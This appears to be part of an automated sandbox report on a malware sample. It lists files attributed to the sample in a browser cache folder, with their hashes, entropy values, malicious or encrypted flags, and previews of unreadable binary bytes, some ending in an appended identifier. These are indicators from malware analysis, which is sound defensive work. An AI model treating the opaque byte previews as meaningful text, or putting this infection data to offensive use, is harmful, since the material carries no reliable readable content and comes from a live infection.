                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Y.E..8..B...a^ .>L.ta.9..1X..[_..(lPM......qj.3....r...^.O..)..=.jz.....g..../.v...Z>..ed.A.M...../N.. l.`+:.....>%#....0.q.e....l.-...#....%.:....<,.mf..[...u4..P#r.J~o]\.Q.~.qP.....nfN..2.KL..6._P.k..K..!0.D\.~......^.h.cO.J..~.b2c..nwPq".(V.(.`..]........4..d.b.$..*....F].....-...|L^.......I.Y...,H.D..[..U....K.....pL.?F..9.Gi....p.I.+c..,.H.'..#......%sx...i.%(3-..,..)2b..$..k.HV.....( Y.c..I....cx...G^...O.....3h....l....N=u......>o.He.V....19...N.Ap}! ......#7).K..?.\!..U.;..~}..Z.v.A..[....X....q:...?.Y....7.n..U.6..Q>..\......^.#.q2.!a.D;hG{yQ....T*x....(..A._..>.....f7.ip..w_....<..|.....w.$}s!...w{.~.......~o.."u.?...3..r....f...s.ue3.M1....C.C..w-....o.`.}/S."..$x......_.........Pc..^-..Y0~...e..v..T..w..3X#..[....._T4.c.*.U...h~gX..F..._..~.1WbS..\.L'/.bK.R.K8.mN.Y.....n3B...*-.I/Q..&..e...4..J.b. ....<(...".w.%f......W8......Y...%Z..b.L...v.p...?e@D..pG..^..@:W...4k.....Hb..!{..p....3BW.....v......IK*..x..X.In..{....J.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\checksync[1].htm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):12933
                                                                                                                                                                                                    Entropy (8bit):7.986188379756558
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:pP7YXfQZ2JYg3sdEpV9y0RkaMj4b3BuD505:N7Y9YUsdEpC0WaMUb3G505
                                                                                                                                                                                                    MD5:AC9D2D5C0631EED696207798B426FA5C
                                                                                                                                                                                                    SHA1:41A471BBD11DF63C7BD80B386FFF9DF37BBD972E
                                                                                                                                                                                                    SHA-256:653CA60B191A60206EB261A04B2216AFB29984A484A3B6D5F8317F9DB216CAF7
                                                                                                                                                                                                    SHA-512:091F1F7078A3106AD55C10523D09C6CA3D601B97C5753854E3B26B6AC2040B8E08D70F9591CCD349CFBA01203037FB1553651092570DFD01A340E264CAFEFC97
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .\.+..Lp%.F.8.=.&.:".....f.5..d.3.E...r..."...T.Ak.....y..r6j.X.X..6...-.(...c.]..wQ.......('....x.....v....T.`..4P.[..9...mhTC..`.Y....)...pX7.',........~..P.]...d.S.).)..Xb........=rT.*1u..P...@...u.....-h..U\7i..e..o*..*(....T.s.Q8.=..#U...o.....u/..."./.Z.P..#...... ..4..G..[;G..`.. j....I...U.|.%3C $......gJ..N...7....A.Pi....i.7q.....T.^.._...28..|..f<..N..mK\..o...J^j.>v..Ks^..Y..l.@.. .P.5..,.*..x.....A.l.......4n.....Q..Q.a.@5.:..X\....n..&.%d..7....wu(...c..2..4t.......@...J..".D.4f"... ..*.0........5./.NA:.&G^.....E'j....Z...x|....6........!.VJ^A9....Q'A-..d.}...,U.*T..p".6.D....a.0He./mCa.C.....%....uX..NC.N3..^....OZ..t/=.G.....O..u..'.../...j...K...........{.<Xy....M.f.$...|..uL.....LM..j~ ..&.6.'..*.t."$......4H.-.I........m.3.I....%.....Q(....P.....Z/k...._.C.`.x_...\..\.HW%.....K.....'.x....:o.. ..q..Z..8....X.n}..N:*...k.\S.:...3...R..d.!.7....DB.d..Ie....DW...4R].....r..K.?sIzO..H..........w.=P_Z.-\..wF..b~R.c..o.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\cursor-replay[1].bmp
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4615
                                                                                                                                                                                                    Entropy (8bit):7.962446732701274
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:CxfsROX/40inrgrfIbLrVW5PDlUdH74gYHjW/ZKpuG:+fsRS/40zfIBWND2HsgYDWheuG
                                                                                                                                                                                                    MD5:24E75726E56C1E535A437FE570D11AB3
                                                                                                                                                                                                    SHA1:1954AFDAFC61C21474D9291DCFEA2F7188C13983
                                                                                                                                                                                                    SHA-256:BFFFEE96D652955FDE1EBA33A218BC826DDF9398F571B40E171C3E4A5C57D6BF
                                                                                                                                                                                                    SHA-512:FBBA859040D7E457CFD63B5D6520F61F8B94E7B99DCF08F02E2278E01A78F14F28A49281FC7B998F9D764918E405ECC127BDFE455CEA3CC630478069AB597A02
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ;...z.4y.;....7..H._.6.y.l..S..8c..........;....X'......-3.e.4.p..s......q.Z..H..g..t....[....9#.PC..?.../.\.;|io.E._...G.$.+....`....B]O..XU=[g...5.m..N...U..._I........L.>.|.^|c.X}p...j...Y..sz.y.....'3_E...@.F.a..!.2.(...@..i@p<...^.......h...3....8R.....X..VD.>..J1..:z...Lr..'..up5..e.Q.).a.._...m.6..0.....f...*.{....<>......w=`.M.%g..>.~E."+.J,.l.?.r..l..C.`1.Dk.q.....m.KN|.m?..O.T"Q.>.).%!#..8".d..Q..n...'....S.U.....U...,......u.9...Z..L.._..%q.q....R......(..y.pv6.Hkm.q6....{......@.hQ....Nk$...j&&Y32F..n.7.]s..j0...{..M@...l..`u..m<..M.f88@.)RW...*{|....Yp..e...R..I.....cSoC.........t.....;.q.G.Q...].O.........y1.[..1.j.....o.......@..i6u...d.`.XT.]..7[..(S.>...*.....O.W..V. }&....~..6.[.].+ok....Y..7J.3..E.....v:b...v..c.Z.?.+_.lm.f..8.nZ..f..&>B.pw...S.......*?...]..DEWQ...0....?.L..6PwQn.....f...zC'..`..n.T..[.R.^..\.....@..7.M.[..b(5..$.Q.#..p.\.R.......A...s.......(`...`A+..Z...iN.".IO.H.....6.=...}Te....CP..tC.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\de-ch[1].json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):140508
                                                                                                                                                                                                    Entropy (8bit):7.998720345707854
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:IF89QgmoBB01ETCEXSM5PjFH+tPq3EieLSCZRuuOMHA1rWTzgxzd0:IF5/oBBLHXLPjZmPq5ObWMg9Fze
                                                                                                                                                                                                    MD5:D786AC93DBACED2F8AF809780D00F1CE
                                                                                                                                                                                                    SHA1:33451CA7284DC45A93305BFA85F09334E2540E37
                                                                                                                                                                                                    SHA-256:B80F01B1157EAC7E2226B6719288A6E3A11CC1BC85F4D390CE1E6508A676982A
                                                                                                                                                                                                    SHA-512:CE31A39830C4EE3DE2ABE762E70C98D609851C09CB40A6EF8376A15E01D276D7EB11D72D929D6B2C6567F848A96ADC18F3B6020BC35FD74E38E5F059D65D85A3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: pv.#Nw.@..D..|2.j.g$G`.ET2H5Z ...W..zs .m....3....7.....zW..cZ.vu..d...F25.....0I.54d.j..}..T9..4V......p../.Xw.x.i.[gt.O1..CS..j.T\&wd6/.2.<.....]....kE.h.......w.{Mn..M...wI...X.+..PT&y...=..FF...u.....|...!B)z.x.h.LO......FS..8D.Q...m...=.g2)....... ,....blBr...a..n........l.o(...ksW...-3..V......+..(...........M.>.D.C.a5...7.Y..r.......>..I....o...E...Vb.G.$.@.N.co.Hf....@.8$.UDH.!.J.|o........t.0...A....D#...C.<y........3..bK.2_....Ym..7TFs...PD.b.&w......G.e..t.*[ ...h,.r_j...g>.......qWw.b.=4...\7..|....?....(...r.I...h.5Ba......=5........{..R2.....4.C8A..c.F.M.d5../..4.;........._(D...U?W.D...%.Ak*5]...O.......5..M'/R%...U.....o.......).s*%p..7.....(.J.....V..9$..+."wz...I..4.+....W.[..W...u......8Y...5t.6........"..`?D.mG....,..7.4..h....kbP.w.F....X-...k...^.(V).Z.M6>l.OS.<)....{..klC..+...t@..y.r[.1...W......F.C6N@&.......>.-!-Y.@?.....L=bG..*4..a...W.;......g!.u...<s... ......y.w.8.W...g|.....!............`.....a.......1..HQ...}..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\eRYlUYIMYsB_Pt8B7FTik-pl5cs.gz[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):558
                                                                                                                                                                                                    Entropy (8bit):7.544687608343858
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:ot8ZRxkyo0PU7yaZzFWmKpOWq6EpI1aCUt7kQxstjDqWov9kcii9a:oWxpPoRFIOWq5pwUt7pxs1DqBkbD
                                                                                                                                                                                                    MD5:EED2BCE7D5AD1754936AD1395181D4AA
                                                                                                                                                                                                    SHA1:EF0F31C4CF2E3BD970054F60417B3664F3D2D9AC
                                                                                                                                                                                                    SHA-256:426C17F3B83C7709509D981E69FD2929FD0B674B3FBF288C882367860988DCBB
                                                                                                                                                                                                    SHA-512:B02D0A84FAA06213C135C66886320EF7BC2563293F1BE43F84801447C6FD5212FB112EEAFA1CE8E81405B11624C3B9E6B8FC10D11218C3BED7F9762AE6573DC1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .k..5..;.@..Br..X.4.t..Ys.._..d."..n..o._...M(.[..0E...a...Z.j.....S.Q..HJH....r.6.[>.........'.l...B..V...c....9.....b.p..Xw...iQ..0.e.b..Q.HW...U.\....MS..e,>.l......W.%=..l..Q`.P..[..`.\...Dg...e....Z...9K.].-|..#.V...W)~...{...fXrX....)..)b...G.....>`_....I.\......L\...$.9...~`F..\%.,.S&`.....#.Yl...J........z.=.i.j....z..f.b.IwA!J..DnQ.........A...-)>*.N|b.....p.l.2.Y.......'.e.>..g..P....2.....P..S.|X/.p.OS......^B.'....W.|6.3.....J..~#J.Q.ak..j.F..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\f[1].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):30403
                                                                                                                                                                                                    Entropy (8bit):7.992987956134961
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:1+z4TTXIv0rHRGkexeJKuduFhbqGEUpbwfvrDckIGZl:1BmW6FRqObwfvrgMZl
                                                                                                                                                                                                    MD5:5035F2028E148E0C2A144FEDA63FDC18
                                                                                                                                                                                                    SHA1:567F3CA50F529F674C3CEB74D7DB4C4C41D8268E
                                                                                                                                                                                                    SHA-256:ADD324BC0BD388E44E99135AF890DFCB372589A0DD81150696CFC5CBE4F4A39D
                                                                                                                                                                                                    SHA-512:2015C865B7F0DE70577D0796E3BB5AC343F797A533AC81C947712ECA80F0DBDE784A2E3F9B598B07473E50B9C982C6CEFB24D944AB29FF4627D2094EC39AC3C5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..I..4.IO.7...3.9u.........Dl.m.......{..}#/...M..nR.....n...Or.M..).{....B.N.h.....S..d.D$G.~u..yR..D.&...m..^.O......].W..z7/...)..M%uL.........=..........$x_...US.....:.j..+........CE7..O.t28...... .}Q.....|...@.........0fQ._,.B..Y!S...xv$[..^.n>....T.8."z,/C{./ .2g.;.....C...Y>.....Ue.[...(..ntBS\X?.=@...{...W...w6....!Z...6....#j.>..d:.i.-m..j..9..W.....6!|.|.';e_..8u......t.u...1C.,.2_.z..k...@.C4/..@q.....E G.|\..h.Z.].....,cZ].).......$*...Kw.?F6.W..MwJN........4.@$MCt...e...%..{....!.yq............0.V.43...D... WgO..>.?....P.%.T..w........!q.:V.......RD...U.d.B..*(.W.(...WJ..D...<k..i..@%......670.&..B...wL.`.W..'{x..%...b9YT(.w9f....Zi..}p+......)&a..hr..v$.P...].o.R(..7.e..P.w..;.3.Vj!5.ZI+g.p.b)>.`.>..^w(...3....w.C.N.D..j).m.;.^.L.......S........1Ai..".I.)..........i 3%o.r.O.a.R...G..o...Y ./.4....BK...R9.X...N{...dE$J..E.#...j..?@F........... .......".F......)5co..`..iS...Y.at.....".0J.....VI....!$W.D.+......./O..X..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\f[2].txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2383
                                                                                                                                                                                                    Entropy (8bit):7.911473869753034
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:6BAqTf9jMnu3x/btP0UYmnd0f1n4mJSNp/rjjVZJ2D:07VM4x/bqUFnKNJSNphO
                                                                                                                                                                                                    MD5:1B075295EC94EBF07CB471E1F69820D6
                                                                                                                                                                                                    SHA1:3F049FB01A15B5F663360EA7A79919E8E4C01AB3
                                                                                                                                                                                                    SHA-256:97BCBB73C24AA48122C1B9DCB5D4D3DC2E7C462292BBBB33DF89CB0F72A28F45
                                                                                                                                                                                                    SHA-512:D9193E373D16F4CB4FCA5595B59500270DB49A442D420DBF44A76A12E61B190FBBDB1F523E4695A719BF45F6AA770F2C6F7EE7DD19113B1634BB68B44250A394
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Z.......{zl...@.(.ds.J`.....mGK..Oq.v.=..M.ov..7}5.(.X.+.I${.Z.b.u...j..e.{Yi..V.j...)X.1.e.v....WI...S.s..?.T...9....o./.sU..P..9..vH...FW..v......8b...X.-....|F.8g_R6$/..@..U..?.....I....B).K4m.(..R...t.|.%FN.o...1.Q#ea..P..F.....&v...sm02..Z..f......dP...7..n{..j4.6.1..R.'..............p..A...{.0!!..~UH/{.hh...{.[OI.m....4.msd=;..}..m.9.w...D......ynj..x.W....].W.7!.0a.........G!.K........T{...i.o.}t.:.n..#5.=.nN.#.\........>Y..."p..A........{r.. *.....'.....MiY.U.........vHy..v.^..0c.^.j.........p.Le;.I......p.<...D..b..:~f.dn.cy..}0.B.......G.=g..@y....-..|.j..F1]..\:.uR.._.C......S..3..Y.WG.. ...\......+<.[s8.`...y..V.%..Z..]....7'.=X...w....^H..J|.9.Q...t.W.{u.I......."..........]3...WH.i.]+j...Vn..V..4i.C.$.......g....G.:..d.s.....0.*..l...J....H...&.cH....4.mk..A.....v.....i.5.d.'.w.h.2...|.E.t.m&.........v...G.l]i...t;.39...<..S'.....`.v.z.y....#....J.d.............*\......>......V...#.^....Qq..u..=.r..#.R.........R...i..d
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\fdVZU4ttbw8NDRm6H3I5BW3_vCo[1].svg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1000
                                                                                                                                                                                                    Entropy (8bit):7.760270286467174
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:12+WxlMRlN0QsF6RGanqNMJfp7CzSBissU7z8BudbD:1ZWMJXp7COBNsU7QcD
                                                                                                                                                                                                    MD5:5D356989FA46A8DDFB08F6DA5EC827ED
                                                                                                                                                                                                    SHA1:D1133B5957AB0E22A44F6DDB542EAB03B1CB1A92
                                                                                                                                                                                                    SHA-256:F0675DC1A1F01CAA07FCC31E5EABB655DE7AE724DA0F9D8CEEDAB6CD25CA66DE
                                                                                                                                                                                                    SHA-512:69DF525F16F46A9C5023EF96A68A7E67DB0AC825B16E54B9E7D96116741B64B287C67F5BE809D5680349BA8DF0D3824CF717B897B62A55D9BC55367ACF4133C0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: \T.wT...K.s[. rF.Z.Z.$.G.....V.\.....Z..K..4.Q......b%..iU.I......j..1..f,...}..2..2#.....Q.....h..;..N.X.(.....K.K.H..".A.....Uh....%0.....u.)...Xw..D.....-^..V..:^..*,b....p.O.v..e.^.;..S.....`~.>..Z.9.>S..n..p0S....:F.B.d.....rO".. ......K....zn.....?1t.....*.....7.gf.o...$.....x;<...!W$&.K..dK..XO1`.nV..u.fW.(a<..0..V.S.[c.r,4%..#..u;]X....).'2.I...x.<.......^^..f...)F...f_..V.....4K.pA.....h.].2.\.G.M..F.X....M./..}...5.....M.....e.W..mN.^.4..t.$V..I..M.a....*....[..W.}D .q.r.n.V".4...:C3.a..F...A.{.< .....*...\.*..>%.#8.6..).w....H...7...o.:;.....9..8..Y.`...:y.p...n....cVP.U.......:"..K......`./...i.x...X.-..%....X.B..[.u.p.........q..J.<Qy......Kk...b.j.$!.u.....^......?..}...cY....A..fA...n..hs3.[.....m..........oyE.......6+.[...K&.......Bjs.P..["...**..._.gS...A.F..V.n.\}...j.....u!..wW.....@........~{...EW4..FkJ..z.m.......t.a9....N.Q2....t{-5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\google-canary[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2755
                                                                                                                                                                                                    Entropy (8bit):7.928731348765327
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:WqjXilfmoYeCZqizPwVekM1/IzgsxvHtg6gU59NEz7WMW28EmqI4MD:W+yeoYeEdwoOvPuIEz7rWJ4o
                                                                                                                                                                                                    MD5:5E938207236233381982EB942C2CF094
                                                                                                                                                                                                    SHA1:68B1C00A942D7A562DDD99FA408269CC3830B78A
                                                                                                                                                                                                    SHA-256:06843EDB2123CC8DCC4B7203B0589FE2F38EE7A0EDBC9893B9189C19C1C08481
                                                                                                                                                                                                    SHA-512:B431F7E06861C8D607A835AF3644CA0640F6754B8BFBA7E9BC6343E3E948E48EEC956291AE2796BD68839ECC49000721CBB87CE418C96A8BFCA3BF7E339F45A3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..w.~....X}..m..K..c-..X.l^..1,.\g.[.'....|..S...,H83w.V..jA. 6Fh......".6.o].U.Yft^......>..d......)-..,xc.~...YT.N...3....F.f1.K...Z.h[.....g.3.\...L.;..&....#.Vw...e.M.{..8.@u.b7.-tQ...Z.v.I.H."....2.;..cu.....u.H.....N..Q.*......+..RO.J.Z..`..#0... 4p.6.|".Hn_.T.p....*.[...R.MO..C......!LzK..P.N#....b*..0.p.p-L.8.....;u...{.^...-}h.i.H.....].4|....@k/E$z...[..r.A...J..1'..f.#.,F:..k.H.b.........=.R.&3.H.$R..M..x...K....g!...>jN\..z......98..p.3._.G>.D=.]....=.....>=-Q>#.hu%.jpE.D...sX!.Q.Ga...ZW..S!.^XE.`?...0..u....E..N.....qs.....,JMt.3&9..FKH..k......^.4.......VM.2.5.......N.hI.T..e%4u...V.kD....?...g.x!... 9lB..."..N.Nk2..n..(.p...Hy..:..u(.A......h.....Zi.'M,.R....7n.....".X&..i...b.-..Y...G........2.*...Bx...2pr..UhV7..A.plKt.8..l./i....[.....2..R.A..`A.Vy.:...Q9.<vH./pS9...G....3X...Z.4..f@q.$`..35d.O...b.0;........2Z.:T'=e....PWH...Y8..'...W.o..j.....iV..B.........?..u....s.**...!B.Zv.\@A......po..m...N'.....xU..|.qrM8V.%T.1-k......u
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\hero-anim-bottom-left[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):10699
                                                                                                                                                                                                    Entropy (8bit):7.981584506307125
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:/ysOfOSAbn8+IqW+/VJrn25iYoRF2neZpYieKeebv1lE3:FfSZHgFkiBq0pYi73i
                                                                                                                                                                                                    MD5:AED0ED1B916168AFEDB319E465C792EC
                                                                                                                                                                                                    SHA1:CD9A8A7851CFE597917136D1EDB5F1765CC85FE5
                                                                                                                                                                                                    SHA-256:EA7C0673179D64CEADFB2E099D982D2A1CF1CF8D619B076BE66EA2C7CBC409CB
                                                                                                                                                                                                    SHA-512:4CE20C7CB42A85686D45FDD8A77A0E5099AEFE6DE9FB3341BC1C76455C542C39AEFFE25FFC30D4AA6BE7F88C3DF9A09D908A8C5C2D4FCC16B8783860D948900C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: s.&'l.WO..N.f.M..DZ...e....].?.H.eb.|.-.....h.=.C...iN@.S7.....f....w.6y....{...... kg..`...W.R-........=<.?..C..Lhd.Il_.nKQ.....9qw..o......0.....b.RJ.|...H....:........3D.p.lO....J.p..P...x.....9..\q...wF-..v.. #^Im.E..$-q.t.....@.b....wC[.G.g/......R.a....... *......(....5.......V..=...v>r.H`.l<@.I.bj(.NkKd<....Byp;....`.N.h..|..0..Wc.H(..i.d...K....6..k...T..3?...i........K.}...Q.]QlD..[4/..[Q....:W......"}.I..+G.}iSWu.N...R.$...T.Z2X.....~......#..[.a1.....R.B*I...5.i...........Fil^3C.:...5...d...:..j.;...z........k........D.JC..z>..R.z........I\E.g}W...r..t.C.3...{..dKT.N,.E....2g..S.#.......L:%..(..r..Z..{&...m.V....D..S$od...Z.c;.u...}.Y....Z.."....)..8....i...V.I..".....;c:..15...od2....4.~.c.....B;.Y..K... ..5@q....G.7....V..A.S*T./..q.9.x.).I.D..o5...1.-x..%...`.\.;R.......+.....noZ...g....:C...D!%..$.oC0.Gcc(../.vM...^h.`..&~.......F.....*.I,L.j.+...R....5....*+.J..V.`..h........U...z..7.2b.j....x.l...0.....G.gs...?...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\hero-anim-middle[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2164
                                                                                                                                                                                                    Entropy (8bit):7.90175614175637
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:T0s1YXCJvhuqH6XwjbkW0PHLQM8mVIY2vZYFB31s1C4AcD:T0sYXgmgbpazVqvZYFBFs1C4AY
                                                                                                                                                                                                    MD5:AD3E3F78BE90702D14FD5BE6D9C714A5
                                                                                                                                                                                                    SHA1:4F34A96DE2BD85046E7BA7DCDC9EF63FEC120AFB
                                                                                                                                                                                                    SHA-256:75B7BF10B3335D2295FBB717918AF813EFD8B2C6EC79F76CB3EA04966FC1B47B
                                                                                                                                                                                                    SHA-512:AB5669B240FD8F0CEAD38583CBEF34EA0ABF79837EE4953635A787CB3026FA8E601E434CE97E3FACBED15C85DE1BB95A9F4A0FCF5EA0BDCAFA4702384AFADE01
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..F.W.y..'..@...5.tW...+..`...g.tQ..P.&/....34.!.v. ........#.$2..h4......-..".X....'..kl..l...d<N-BJf .v.R.6..x..@..9q..Hp...f0..+.sv%..5.{........r ./.,..5.6v.;p..*.........~X.2...Y....>(.U6..|.......:.F.0.D{5.D..^.........W.sK.Z..)..mu.qO.W..yM..,\..."....4....&.a|.m...Zm..[....c.9...Ot.....2..!,........6..H..._.....rcc.Ok..u.B<.8`v[..~q...b..h...T8f...h......d.a.,R.l......c.........?...${.o0....3.o.......K.J.sc.:..._........XD@2.(.5...n461.B2...#..-....@.J.>p-Fk....v.WgJD&.-.f.#.G....~....K...7..7.Cyi..v....=3...C"..U.6X.}...9...P|u].L*........8.lz...... .J"@.S....../.B.`?kd..!?,.q....i...../......&.*.a..V.[.=.p..jm}...8...W.B.S.;J..r...H....~Wn..I.'..H.mi....Z../...[...gRN.@..'=Y={...d..b.M.t.j.:...w..F...q.n..n...4.O.....m....v..9Y.......f..1r..<#.O{m`...y.W........y."#..}..4.....3...`...6F.h...;EGZ....;.-R...G...?.X....MDZ....2N...[U.&....k...=...Cl..2{...>.u.#.,......*.i....i.......kw..U{..>GRg4<..W.!3..h...K.j`x..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\icon-file-download[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1482
                                                                                                                                                                                                    Entropy (8bit):7.844313914910813
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:yeE12Aiszqd0raCEZ6z6lgr4gIiVkRkjyobqB7auuxyfBeTTMq/Ob8TF5n/5bD:JAbMsaAIfgIIQiyobqBOBxyfBiOgR5n5
                                                                                                                                                                                                    MD5:28B4FAE4FD3EB00E4C67F5CC8BF2096F
                                                                                                                                                                                                    SHA1:3D059D288A76008512F39FD35D5A6CB7E71D6BA2
                                                                                                                                                                                                    SHA-256:33B6A649973C030A74C3A3BEC1855014C0D0DCB54B55F46FE107471FF1EED635
                                                                                                                                                                                                    SHA-512:16CC952B70AE30EB7606E5BAE1ADAE2B83DDFAA7E8E79D1D2E1A72C9CD89EDCA52BB2E7BC123955460DAA26286B0447F31C70D3D8F78D8DD910813EDA4F51FA3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..n..m..U....z.k.s...+NU8.x..o.ZZ(..z.....RFU.fr{.@_.....Z...n..}..../K....h.c...>s2...XJ....?..5.Q.}..../_,...Q.........}...... s.....P(.z......r.CU].a.....!.....<.H...T..H.+...d%..\..$=\.l....._.....D.Q>v./.....'n.Fi..SCPm<.8..9.h.O..b1.$...gh}f..}..Q.Os#P.(..7lY@.2.+..~..=h.J...S.....]2.k..4c/....r.i.QS?.e.).3....U.E.=.4.?]....C.......I..Z6.u..&f....;.wb.#...r.m..}.4P....].-..[..%...W.[.b.\Q:.E;.?=.....w..ND...3..Od)X.f.r;...|...o.../.x.....u.j...F.....8...Yo....+..VPK.!......F.O.t..:..1..e..Ri4.oz.d.._.Z..>...Sr.....9.k!8..5.. .Q@.8..U......-u...G<..x..ZK.g.......T(.-..r.....G...OM.....$u+.../...Q`=f..#.}.^mP...b....(~.`.,...X..5.tod....t.*..E].XL.......8.e..*.uz.=.Q.4.....H........v.:_........p.z..B.X<.1A.L.a]4..r..V.&..6yb.@.. .......g.\S.......l^.36....j..c.^..F..U.w..a.<...{FZ.5._n.s....r.;....U..... ....\..%p.KS..e..d...f........Q.+{.6~..v.4.m....K..{tI...R.#.....*.c-..5}..4..&../B..n...!pm...^B...5.Z....#.@.5:.+.z..e...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\X2GCHJOK\icon-file-download[1].svg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):640
                                                                                                                                                                                                    Entropy (8bit):7.613392627103919
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Ncrbh06zpGBIBUzYEZPNR3ycy21GhbRqX++3N42ih2E6ecii9a:NabhbzR8t3ycy2Ql+N42iQnebD
                                                                                                                                                                                                    MD5:7CDA158B79DEF44E781924CE1A2E2400
                                                                                                                                                                                                    SHA1:79A613F46030EF36968464AD40F2778BD3C8168B
                                                                                                                                                                                                    SHA-256:600210A49927DB74C37688343B913A68B3FE51303CFA6EF8F315508665C5C400
                                                                                                                                                                                                    SHA-512:9E4D05CE0FD7FC005C47F17C536741106A3BA4B895EF81BA6E1C464C5E78DEB83E5A87E62595990B8ADDBC94347C18C73CA6713FAD36DC394F586A1FD8B6EEB0
